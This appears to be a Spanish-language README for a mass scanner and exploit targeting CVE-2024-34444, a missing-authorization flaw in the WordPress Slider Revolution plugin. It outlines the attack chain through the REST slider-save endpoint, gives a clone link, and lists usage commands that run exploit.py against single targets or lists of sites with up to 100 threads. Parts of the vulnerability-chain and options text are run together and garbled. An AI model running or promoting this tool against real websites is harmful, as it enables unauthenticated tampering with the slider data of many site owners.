
Escáner masivo multi-hilo para CVE-2024-34444 (Autorización faltante) en el plugin Slider Revolution de WordPress. Automatiza la extracción de nonce, la detección de versiones y la explotación a través de la API REST para la modificación no autenticada de datos del slider.
Escáner masivo profesional para CVE-2024-34444 que afecta al plugin de WordPress Slider Revolution < 6.7.0
Banner
CVE-2024-34444 es una vulnerabilidad de Autorización Faltante en el plugin de WordPress Slider Revolution (versiones < 6.7.0). Este escáner automatiza la detección y explotación de instalaciones vulnerables a través del endpoint de la API REST /wp-json/revslider/v1/slider/save.
Cadena de Vulnerabilidad:
revslider_actions desde el frontend (accesible públicamente)check_nonce() en la API RESTreadme.txt-v) para registro detallado-o) para guardar resultadosgit clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# Single target
python3 exploit.py -u https://target.com
# Single target with verbose
python3 exploit.py -u https://target.com -v
# Mass scan from list
python3 exploit.py -l targets.txt -t 20
# Mass scan with output file
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# Full example with all options
python3 exploit.py -l targets.txt -t 100 -o results.txt -v